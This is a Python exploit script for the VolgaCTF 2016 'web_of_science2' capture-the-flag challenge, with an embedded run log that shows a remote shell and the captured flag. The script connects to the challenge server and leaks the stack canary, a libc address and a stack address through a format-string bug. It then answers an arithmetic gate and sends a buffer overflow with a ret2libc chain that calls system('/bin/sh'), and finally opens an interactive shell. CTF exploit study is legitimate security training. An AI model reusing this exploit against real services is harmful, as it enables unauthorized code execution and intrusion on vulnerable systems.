import socket
import telnetlib
import struct
import hashlib
import random
"""
root $ python web_of_science2.py
[*] connected to webofscience2.2016.volgactf.ru:45679
[+] recv: 'Tell me your name first\n'
[*] send format string to leak addresses
[+] recv: 'Alright, pass a little test first, would you.\n3668 + 8932 = ?\ncanary:|||985e5f08a2bbd800||| srand@GOT:|||\xa0Yg\xf7\xff\x7f||| stack:|||7fffffffeba0|||, your response: '
[*] stack canary: 0x985e5f08a2bbd800
[*] srand@GOT: 0x7ffff76759a0
[*] stack: 0x7fffffffeba0
[*] libc base: 0x7ffff7639000
[*] system(): 0x7ffff767f640
[+] Solving the 0. sum: 3668 + 8932 = 12600
[+] Solving the 1. sum: 45317 + 33218 = 78535
[+] Solving the 2. sum: 40618 + 20647 = 61265
[+] Solving the 3. sum: 7894 + 26236 = 34130
[+] Solving the 4. sum: 47062 + 28527 = 75589
[+] Solving the 5. sum: 58563 + 25165 = 83728
[+] Solving the 6. sum: 43846 + 3454 = 47300
[+] Solving the 7. sum: 25307 + 25358 = 50665
[+] Solving the 8. sum: 41468 + 10092 = 51560
[+] Solving the 9. sum: 5859 + 28760 = 34619
[*] Sending the buffer overflow
[*] Exit the menu, to trigger the `ret`
[*] here is your shell:
Linux Ubuntu1404x64 3.13.0-83-generic #127-Ubuntu SMP Fri Mar 11 00:25:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
ls -la
total 32
drwxr-xr-x 2 root root 4096 Mar 26 08:11 .
drwxr-xr-x 22 root root 4096 Mar 26 07:43 ..
-rw-r--r-- 1 root root 37 Mar 26 07:47 flag_wos2.txt
-rwxr-xr-x 1 root root 85 Mar 26 07:47 install
-rwxr-xr-x 1 root root 295 Mar 26 08:11 start_wos2
-rwxr-xr-x 1 root root 10504 Mar 26 07:47 web_of_science2
cat flag_wos2.txt
VolgaCTF{DEP_with0ut_ASLR_is_us3less}
"""
REMOTE = True  # True: attack the CTF server configured below; False: a local copy served via the socat line further down
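def padzero(s, width=8):
    """Right-pad *s* with NUL bytes to *width* bytes (default 8, one x86-64 word).

    Used to widen a pointer leaked through a ``%s`` format directive: that
    leak stops at the first NUL byte, so a 64-bit address whose high bytes are
    zero (the 0x7fff... userland pointers seen in the run log have only six
    significant bytes) arrives shorter than 8 bytes and must be padded before
    ``struct.unpack("Q", ...)`` can decode it.

    If *s* is already *width* bytes or longer it is returned unchanged — the
    pad multiplier is zero or negative, which yields an empty pad — and a
    later ``struct.unpack`` will reject the oversized input. Note the other
    edge: an empty leak (pointer whose lowest byte is NUL) pads to all-NUL,
    i.e. decodes to address 0; the caller cannot tell that from a real leak.
    Python 2 script: *s* is a ``str`` used as a byte string.
    """
    return s + "\x00" * (width - len(s))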
def recv_all(s):
    """Drain everything currently readable from socket *s* and return it as one string.

    Reads 1024-byte chunks until either the peer closes the connection
    (``recv`` returns an empty string) or the socket's timeout fires
    (``socket.timeout`` is swallowed and treated as end-of-data). Any other
    socket error propagates. The caller is expected to have called
    ``settimeout`` on *s* beforehand; without one this blocks until the peer
    closes the connection.
    """
    chunks = []
    while True:
        try:
            chunk = s.recv(1024)
        except socket.timeout:
            break
        if not chunk:
            break
        chunks.append(chunk)
    return "".join(chunks)
# Local test harness when REMOTE is False:
#   socat TCP-LISTEN:1337,reuseaddr,fork EXEC:"./web_of_science2"
LOCAL_SERVER = ('localhost', 1337)
REMOTE_SERVER = ('webofscience2.2016.volgactf.ru', 45679)
SERVER = REMOTE_SERVER if REMOTE else LOCAL_SERVER

# libc offsets, relative to the libc base recovered from the srand@GOT leak.
# They are specific to the target's libc build (the run log reports an
# Ubuntu 14.04 x86-64 box); against a different libc the ROP chain lands in
# the wrong place even though the leak itself still works.
SRANDOM_OFFSET = 0x3c9a0   # presumably srand(), the function whose GOT entry is leaked
SYSTEM_OFFSET = 0x46640    # system()
POP_RDI_OFFSET = 0x22b1a   # `pop rdi; ret` gadget used to load system()'s argument
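def solve_sum(line):
    """Parse one arithmetic challenge line such as ``"3668 + 8932 = ?"``.

    Splits on single spaces and adds the first and third tokens, exactly as
    the original exploit did — there is no validation beyond ``int()``
    raising on junk. Returns ``(left_token, right_token, total)`` with the
    tokens kept as strings so the caller can echo them in its log line.
    """
    tokens = line.split(" ")
    return tokens[0], tokens[2], int(tokens[0]) + int(tokens[2])


def leak_addresses(sock):
    """Abuse the name prompt's format-string bug to leak canary, libc and stack.

    The name is echoed through printf-style formatting, so positional
    directives read the vulnerable function's stack:
      %43$llx -> the stack canary of the frame we later smash
      %23$s   -> dereferences the pointer in stack slot 23 — labelled
                 srand@GOT, so presumably srand's GOT entry — printing the
                 bytes of srand's address inside libc (stops at the first
                 NUL byte, hence padzero())
      %46$llx -> a stack address, later handed to system() as its argument

    Prints the raw reply like the rest of the script and returns
    ``(canary, srand_addr, stack_addr, reply)``; *reply* also carries the
    first arithmetic challenge, which the caller must still answer.
    Raises RuntimeError if the reply does not contain the three
    '|||'-framed fields (e.g. the 0.5 s recv timeout fired before the
    server answered), instead of a bare IndexError deep in the parsing.
    """
    sock.sendall("canary:|||%43$llx||| srand@GOT:|||%23$s||| stack:|||%46$llx|||\n")
    reply = recv_all(sock)
    print("[+] recv: {}".format(repr(reply)))
    fields = reply.split('|||')
    if len(fields) < 6:
        raise RuntimeError("format-string leak did not come back as expected: {!r}".format(reply))
    canary = int(fields[1], 16)
    # A NUL in the low bytes of the leaked pointer truncates the %s output
    # and this decodes a wrong, smaller value; there is no way to detect it here.
    srand = struct.unpack("Q", padzero(fields[3]))[0]
    stack = int(fields[5], 16)
    return canary, srand, stack, reply


def build_payload(canary, pop_rdi, stack, system):
    """Assemble the stack smash that turns the name overflow into system(<stack leak>).

    Layout, as the original exploit sends it (Python 2: ``str`` is bytes, and
    the ``b""`` literals below are plain ``str`` there):
      40 bytes filler   -- the buffer up to the canary slot
      canary            -- the leaked value, so the stack protector check passes
      8 bytes filler    -- presumably the saved rbp slot
      pop rdi; ret      -- gadget address; the function's `ret` lands here
      stack             -- popped into rdi: system()'s argument, expected to be
                           the address where the string below ends up
      system            -- the gadget's `ret` enters system()
      "/bin/sh;" x 7    -- the command string; the repetition presumably acts
                           as a sled so that an rdi that is a few bytes off
                           still starts inside a valid `/bin/sh;` sequence
    Returns the complete byte string including the trailing newline.
    """
    return b"".join([
        b"AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEE",
        struct.pack("Q", canary),
        b"GGGGGGGG",
        struct.pack("Q", pop_rdi),
        struct.pack("Q", stack),
        struct.pack("Q", system),
        b"/bin/sh;" * 7,
        b"\n",
    ])


def main():
    """Run the exploit end to end against SERVER and hand the shell to the user.

    Steps: connect, leak canary/libc/stack via the format string, solve the
    ten arithmetic challenges that gate the menu, send the ROP payload,
    exit the menu to trigger the `ret`, then attach telnetlib for an
    interactive shell. The addresses in the run log (0x7fff... stack,
    0x7ffff7... libc) match what a non-randomized process gets, and the flag
    text says as much; the script does not rely on that because it leaks at
    runtime, but it does rely on the libc offsets matching the target build.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(SERVER)
    # recv_all() uses this timeout to decide a reply is complete; on a slow
    # link a reply may be cut short and the '|||' parsing below then fails.
    sock.settimeout(0.5)
    print("[*] connected to {}:{}".format(SERVER[0], SERVER[1]))
    try:
        reply = recv_all(sock)
        print("[+] recv: {}".format(repr(reply)))

        print("[*] send format string to leak addresses")
        canary, srand, stack, reply = leak_addresses(sock)
        libc = srand - SRANDOM_OFFSET
        system = libc + SYSTEM_OFFSET
        pop_rdi = libc + POP_RDI_OFFSET
        print("[*] stack canary: 0x{:x}".format(canary))
        print("[*] srand@GOT: 0x{:x}".format(srand))
        print("[*] stack: 0x{:x}".format(stack))
        print("[*] libc base: 0x{:x}".format(libc))
        print("[*] system(): 0x{:x}".format(system))

        # Ten arithmetic rounds gate the vulnerable menu. The first challenge
        # already sits in the leak reply; each answer is followed by a
        # recv_all() whose reply carries the next one. Loop shape kept as in
        # the original: a reply without an '=' line sends nothing this round
        # and the same reply is rescanned next round, and two challenges in
        # one reply are both answered within the same round.
        for i in range(10):
            for line in reply.split("\n"):
                if '=' in line:
                    left, right, total = solve_sum(line)
                    print("[+] Solving the {}. sum: {} + {} = {}".format(i, left, right, total))
                    sock.sendall(str(total) + "\n")
                    reply = recv_all(sock)

        print("[*] Sending the buffer overflow")
        sock.sendall(build_payload(canary, pop_rdi, stack, system))
        print("[*] Exit the menu, to trigger the `ret`")
        sock.sendall("5\n")
        # ignore the menu output
        _ = recv_all(sock)
        print("[*] here is your shell:")
        sock.sendall("uname -a\n")
        sock.sendall("id\n")
        shell = telnetlib.Telnet()
        shell.sock = sock
        shell.interact()
    finally:
        # interact() returns on EOF; release the socket on that and on any error.
        sock.close()


if __name__ == "__main__":
    main()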